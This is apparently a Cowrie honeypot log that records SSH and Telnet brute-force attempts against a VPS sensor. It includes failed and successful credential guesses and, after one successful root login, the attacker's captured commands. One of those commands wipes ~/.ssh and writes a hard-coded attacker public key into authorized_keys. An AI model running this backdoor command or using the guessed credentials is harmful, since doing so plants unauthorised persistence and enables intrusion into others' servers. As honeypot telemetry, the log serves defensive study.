{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:06.825534Z","src_ip":"212.227.125.160","session":"7c4dac1adb21"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:06.826573Z","src_ip":"212.227.125.160","session":"7c4dac1adb21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37108,"dst_ip":"1.2.3.4","dst_port":22,"session":"29de748401d5","protocol":"ssh","message":"New connection: 212.227.125.160:37108 (1.2.3.4:22) [session: 29de748401d5]","sensor":"my-vps","timestamp":"2025-08-26T21:44:11.711479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:44:11.712818Z","src_ip":"212.227.125.160","session":"29de748401d5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:44:11.767485Z","src_ip":"212.227.125.160","session":"29de748401d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47060,"dst_ip":"1.2.3.4","dst_port":23,"session":"e0ee53754a4a","protocol":"telnet","message":"New connection: 212.227.125.160:47060 (1.2.3.4:23) [session: e0ee53754a4a]","sensor":"my-vps","timestamp":"2025-08-26T21:44:12.272326Z"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink","message":"login attempt [flink/flink] failed","sensor":"my-vps","timestamp":"2025-08-26T21:44:12.339963Z","src_ip":"212.227.125.160","session":"29de748401d5"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:13.395907Z","src_ip":"212.227.125.160","session":"29de748401d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47095,"dst_ip":"1.2.3.4","dst_port":23,"session":"495fc3d500d5","protocol":"telnet","message":"New connection: 212.227.125.160:47095 (1.2.3.4:23) [session: 495fc3d500d5]","sensor":"my-vps","timestamp":"2025-08-26T21:44:14.395478Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60726,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d75cf128d21","protocol":"ssh","message":"New connection: 212.227.125.160:60726 (1.2.3.4:22) [session: 3d75cf128d21]","sensor":"my-vps","timestamp":"2025-08-26T21:44:17.454351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:44:17.455322Z","src_ip":"212.227.125.160","session":"3d75cf128d21"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:44:17.504930Z","src_ip":"212.227.125.160","session":"3d75cf128d21"}
{"eventid":"cowrie.login.failed","username":"esroot","password":"esroot","message":"login attempt [esroot/esroot] failed","sensor":"my-vps","timestamp":"2025-08-26T21:44:17.715655Z","src_ip":"212.227.125.160","session":"3d75cf128d21"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:18.788801Z","src_ip":"212.227.125.160","session":"3d75cf128d21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56114,"dst_ip":"1.2.3.4","dst_port":22,"session":"5491016b1049","protocol":"ssh","message":"New connection: 212.227.125.160:56114 (1.2.3.4:22) [session: 5491016b1049]","sensor":"my-vps","timestamp":"2025-08-26T21:44:23.303246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:44:23.326866Z","src_ip":"212.227.125.160","session":"5491016b1049"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:44:23.376345Z","src_ip":"212.227.125.160","session":"5491016b1049"}
{"eventid":"cowrie.login.failed","username":"david","password":"david","message":"login attempt [david/david] failed","sensor":"my-vps","timestamp":"2025-08-26T21:44:23.628744Z","src_ip":"212.227.125.160","session":"5491016b1049"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:24.856976Z","src_ip":"212.227.125.160","session":"5491016b1049"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51502,"dst_ip":"1.2.3.4","dst_port":22,"session":"9934b02d6948","protocol":"ssh","message":"New connection: 212.227.125.160:51502 (1.2.3.4:22) [session: 9934b02d6948]","sensor":"my-vps","timestamp":"2025-08-26T21:44:29.128593Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:44:29.130165Z","src_ip":"212.227.125.160","session":"9934b02d6948"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:44:29.183147Z","src_ip":"212.227.125.160","session":"9934b02d6948"}
{"eventid":"cowrie.login.failed","username":"node","password":"node","message":"login attempt [node/node] failed","sensor":"my-vps","timestamp":"2025-08-26T21:44:29.343556Z","src_ip":"212.227.125.160","session":"9934b02d6948"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:30.395569Z","src_ip":"212.227.125.160","session":"9934b02d6948"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46892,"dst_ip":"1.2.3.4","dst_port":22,"session":"8590112080ed","protocol":"ssh","message":"New connection: 212.227.125.160:46892 (1.2.3.4:22) [session: 8590112080ed]","sensor":"my-vps","timestamp":"2025-08-26T21:44:34.683981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:44:34.735309Z","src_ip":"212.227.125.160","session":"8590112080ed"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:44:34.736079Z","src_ip":"212.227.125.160","session":"8590112080ed"}
{"eventid":"cowrie.login.failed","username":"neo4j","password":"neo4j","message":"login attempt [neo4j/neo4j] failed","sensor":"my-vps","timestamp":"2025-08-26T21:44:35.002048Z","src_ip":"212.227.125.160","session":"8590112080ed"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:36.058127Z","src_ip":"212.227.125.160","session":"8590112080ed"}
{"eventid":"cowrie.session.connect","src_ip":"121.227.152.250","src_port":45974,"dst_ip":"1.2.3.4","dst_port":22,"session":"b118bfd67a44","protocol":"ssh","message":"New connection: 121.227.152.250:45974 (1.2.3.4:22) [session: b118bfd67a44]","sensor":"my-vps","timestamp":"2025-08-26T21:44:39.741706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T21:44:39.742632Z","src_ip":"121.227.152.250","session":"b118bfd67a44"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T21:44:39.947842Z","src_ip":"121.227.152.250","session":"b118bfd67a44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42280,"dst_ip":"1.2.3.4","dst_port":22,"session":"4562cc5185e5","protocol":"ssh","message":"New connection: 212.227.125.160:42280 (1.2.3.4:22) [session: 4562cc5185e5]","sensor":"my-vps","timestamp":"2025-08-26T21:44:39.977300Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:44:39.978553Z","src_ip":"212.227.125.160","session":"4562cc5185e5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:44:40.037815Z","src_ip":"212.227.125.160","session":"4562cc5185e5"}
{"eventid":"cowrie.login.failed","username":"kipt","password":"kipt","message":"login attempt [kipt/kipt] failed","sensor":"my-vps","timestamp":"2025-08-26T21:44:40.337719Z","src_ip":"212.227.125.160","session":"4562cc5185e5"}
{"eventid":"cowrie.login.success","username":"root","password":"5201314..","message":"login attempt [root/5201314..] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:44:40.815674Z","src_ip":"121.227.152.250","session":"b118bfd67a44"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:44:41.287723Z","src_ip":"121.227.152.250","session":"b118bfd67a44"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T21:44:41.288376Z","src_ip":"121.227.152.250","session":"b118bfd67a44"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T21:44:41.289177Z","src_ip":"121.227.152.250","session":"b118bfd67a44"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:41.390490Z","src_ip":"212.227.125.160","session":"4562cc5185e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:41.495401Z","src_ip":"121.227.152.250","session":"b118bfd67a44"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:44:41.927176Z","src_ip":"121.227.152.250","session":"b118bfd67a44"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T21:44:41.927938Z","src_ip":"121.227.152.250","session":"b118bfd67a44"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T21:44:42.135329Z","src_ip":"121.227.152.250","session":"b118bfd67a44"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:42.136384Z","src_ip":"121.227.152.250","session":"b118bfd67a44"}
{"eventid":"cowrie.session.connect","src_ip":"121.227.152.250","src_port":46594,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ff59594b614","protocol":"ssh","message":"New connection: 121.227.152.250:46594 (1.2.3.4:22) [session: 2ff59594b614]","sensor":"my-vps","timestamp":"2025-08-26T21:44:42.300983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T21:44:42.302073Z","src_ip":"121.227.152.250","session":"2ff59594b614"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T21:44:42.481809Z","src_ip":"121.227.152.250","session":"2ff59594b614"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T21:44:43.240385Z","src_ip":"121.227.152.250","session":"2ff59594b614"}
{"eventid":"cowrie.session.closed","duration":31.65479564666748,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:43.927052Z","src_ip":"212.227.125.160","session":"e0ee53754a4a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:44.423126Z","src_ip":"121.227.152.250","session":"2ff59594b614"}
{"eventid":"cowrie.session.connect","src_ip":"121.227.152.250","src_port":47226,"dst_ip":"1.2.3.4","dst_port":22,"session":"57a2c3a2b089","protocol":"ssh","message":"New connection: 121.227.152.250:47226 (1.2.3.4:22) [session: 57a2c3a2b089]","sensor":"my-vps","timestamp":"2025-08-26T21:44:44.618060Z"}
